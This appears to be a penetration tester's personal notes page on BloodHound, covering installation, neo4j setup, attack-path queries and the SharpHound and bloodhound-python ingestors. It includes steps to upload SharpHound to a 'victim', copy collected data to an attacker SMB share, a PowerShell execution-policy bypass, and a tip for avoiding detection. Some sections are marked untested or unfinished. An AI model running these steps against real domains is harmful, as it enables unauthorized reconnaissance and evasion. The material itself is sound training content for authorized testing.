BloodHound – Lisandre

BloodHound is an Active Directory (AD) reconnaissance tool that uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment and easily identify highly complex attack paths that would otherwise be impossible to quickly identify.

BloodHound is composed of a web application and ingestors (for data collection).

OSCP: Officially allowed during the exam according to the OSCP Exam FAQ

Official Documentation (GitHub)
BloodHound with Kali Linux: 101 (Red Teaming Experiments)
How to Sniff Out (and Block) BloodHound Attacks (CrowdStrike)
BloodHound (MITRE)

❗ BloodHoundAD (GitHub) repository will be deprecated soon. Use the SpectorOps (GitHub) repository instead for the BloodHound Community Edition (BloodHound CE).

BloodHound – Web Application:

Data Collection / Ingestors:

Data Collection / Ingestors

SharpHound

BloodHound.py

Certipy-AD

BloodHound – Web Application

Installation

Bloodhound depends on neo4j so that will be installed as well.

sudo apt-get install bloodhound

❗ Overwrite install with the latest BloodHound version. This fixes the users.json not imported in BloodHound (even when in zip file).

Download BloodHound-linux-x64.zip

Check for the latest release.

cd /home/kali

wget https://github.com/BloodHoundAD/BloodHound/releases/download/v4.3.1/BloodHound-linux-x64.zip

💡 Seen in a demo, version of Olivier Lyak (BloodHound-linux-x64).

Or use version of Olivier Lyak (BloodHound-linux-x64), supports ADCS paths:

wget https://github.com/ly4k/BloodHound/releases/download/v4.2.0-ly4k/BloodHound-linux-x64.zip

Unzip

sudo unzip BloodHound-linux-x64.zip

Overwrite original files to keep appropriate permissions

cd BloodHound-linux-x64
sudo cp -R ./* /usr/lib/bloodhound/

Cleanup

cd ~
sudo rm -rf ~/BloodHound-linux-x64
rm BloodHound-linux-x64.zip

Change the Default Password for Neo4j

sudo neo4j console

Open a web browser and go to http://localhost:7474. Enter default credentials neo4j / neo4j.
Enter a new password when asked.

Start BloodHound

Start neo4j, leave terminal window open

sudo neo4j console --verbose

Start Bloodhound, in another window, leave terminal window open

bloodhound

In BloodHound, enter:

bolt://localhost:7687
neo4j
(new changed password, from installation steps)

Usage

Data import

Drag and drop the data collectors’ files in BloodHound. A box will appear with the import status for each file (.json).

Find paths

Search for your current user account in the search box. Use the user SID from enum4linux (authenticated).
It will appear at the center of the screen.
Right-click on it and Set as Starting Node. Right-click and set as Owned.
Click on it.
Click on the Node Info tab.
In tab Analysis, click on Find all Domain Admins.
Right-click on the domain admins and Set as Ending Node. If used for privilege escalation, search for Administrator user and set as ending node.
Right-click on target and Shortest Paths to Here from Owned.
Right-click on lines/links between groups and choose “Help”. This will give information on how to abuse it.

You can also click on any other pre-built queries in the Analysis tab. Or Shortest Path from Owned Principals.

Raw Queries

See query examples: BloodHound Cypher Cheatsheet.

Return all users:

MATCH (u:User) RETURN u

Data Collection / Ingestors

SharpHound

The BloodHound ingestor.

/usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe

Latest version!

wget -O /home/kali/share/SharpHound.exe https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe

Upload SharpHound.exe to the victim. Use PowerShell or Impacket.

Execute SharpHound as a domain user. If you are on a machine that is a member, but you are authenticated as a local user, but have credentials for a domain user, get a shell for that user first.

runas /user:john@example.com cmd.exe

.\SharpHound.exe -c all

Download the zip file to Kali. Use impacket-smbserver. See Impacket.

copy 20220530051149_BloodHound.zip \\x.x.x.x\myshare\

In BloodHound, click on Upload Data and select the .zip file.

BloodHound.py (bloodhound-python)

❗ Supports most, but not all BloodHound (SharpHound) features. Currently GPO local groups are not supported, all other collection methods are implemented.

Bloodhound.Py (kali.org)
Bloodhound.py (GitHub)

This package contains a Python based ingestor for BloodHound, based on Impacket. The installation will add a command line tool bloodhound-python to your PATH. BloodHound.py requires impacket, ldap3 and dnspython to function.

Installation – Kali Linux

sudo apt install bloodhound.py

Installation – Python

pip install bloodhound

Help

bloodhound-python -h

Python based ingestor for BloodHound
For help or reporting issues, visit https://github.com/Fox-IT/BloodHound.py

Usage

-c: Which information to collect. Supported: Group, LocalAdmin, Session, Trusts, Default (all previous), DCOnly (no computer connections), DCOM, RDP,PSRemote, LoggedOn, Container, ObjectProps, ACL, All (all except LoggedOn). You can specify more than one by separating them with a comma. (default: Default)

💡 Use DCOnly to prevent immediate detection by connecting only to the domain controller. Default collection would connect to other computers via RPC and enumerate local groups and active sessions (large volume of data to port 445).

bloodhound-python -c DCOnly -u user01 -d example.com --zip

bloodhound-python -c DCOnly -u user01 -p 'password' -ns dc1.example.com -dc dc1.example.com --zip

Certipy-AD

See Certipy for Active Directory Certificate Services (ADCS) enumeration that can be imported into BloodHound.

Other ingestor?

❗ Used in a demo, no information on this injestor script…

DCOnly will contact the DC only and not local machines?

python3 bloodhound.py -c DCOnly -u user01 -p 'password' -ns dc1.example.com -dc dc1.example.com --zip

python3 bloodhound.py -c DCOnly -u user01 -d example.com --zip

See Certipy-AD in Active Directory Enumeration. This data can be imported into BloudHound.

Other notes to cleanup…

BloodHound requires three pieces of information from an Active Directory environment in order to function:

1. Who is logged on where?
2. Who has admin rights where?
3. What users and groups belong to what groups?
4. (Optionally) What principals have control over other user and group objects?

In most instances, collecting this information does not require Administrator privileges,
and does not require executing code on remote systems. The PowerShell ingestor, 
based on PowerView, makes data collection fast and simple. The ingestor is located 
in the BloodHound repo at /Ingestors/

The collector collects many additional pieces of data which give further paths, 
as well as node properties for convenience.

PowerShell Execution Policy

PowerShell by default will not allow execution of PowerShell scripts; 
however, bypassing this restriction is very simple in most instances. 
Typically you will be able to enter a PowerShell runspace without this restriction by running:

PS C:\> PowerShell -Exec Bypass

Data Ingestion

Data ingestion is done using the BloodHound interface. The interface supports uploading 
Zip files with data, as well as individual JSON files.

#-------------------------------------------------------------------------------
# Data Collection on the target host (Linux, Python script)
#-------------------------------------------------------------------------------
# https://github.com/fox-it/BloodHound.py

# Install the ingestor
sudo apt install python-pip
sudo apt update --fix-missing
pip install bloodhound

# Run the ingestor
USER=kris
bloodhound-python -c Default -u $USER
bloodhound-python -c Group,LocalAdmin -u $USER

Default - Performs group membership collection, domain trust collection, local admin collection, and session collection
Group - Performs group membership collection
LocalAdmin - Performs local admin collection
Session - Performs session collection
Trusts - Performs domain trust enumeration
LoggedOn - Performs privileged Session enumeration (requires local admin on the target)
ObjectProps - Performs Object Properties collection for properties such as LastLogon or PwdLastSet
All - Runs all methods above, except LoggedOn

# -k: use Kerberos
bloodhound-python -c Default -u $USER -k

#-------------------------------------------------------------------------------
# Data Collection on the target host (Windows, C# script with Powershell) - NOT TESTED!!!
#-------------------------------------------------------------------------------
# https://github.com/BloodHoundAD/BloodHound/wiki/Data-Collector

Invoke-BloodHound executes collection options necessary to populate the backend 
BloodHound database. With no options specified, by default it will gather all 
unrolled group membership information, all reachable domain trust information, 
and will gather all session/local admin data on all computers it can reach 
from your current domain. All data will be exported to JSON files in the 
current directory. The *-JSONFolder C:\Temp* parameter will modify the folder 
that the files are output to, and -JSONPrefix domainX will prepend the specified 
flag to the beginning of each output file.

For user session data without a logon domain, by default the global catalog 
is used to attempt to deconflict what domain the user may be located in. 
If the user exists in more than one domain in the forest, a series of weights 
is used to modify the attack path likelihood. If you want to skip this global 
catalog deconfliction approach, specify the -SkipGCDeconfliction flag.

# Powershell ingestor
note op here
powershell-import
cd c:\users\someuserhere\Downloads
powershell Get-BloodHoundData | Export-BloodHoundCSV

# Download all CSV files (group_memberships.csv, local_admins.csv, user_sessions.csv)
# Import CSV files into BloodHound
Click "Upload Data" on the right and choose the files to import

# Click on the icon left to the search bar
# Click on Queries
# Click on links, like "Find all Domain Admins" or "Find Shortest Paths to Domain Admins from Kerberoastable Users"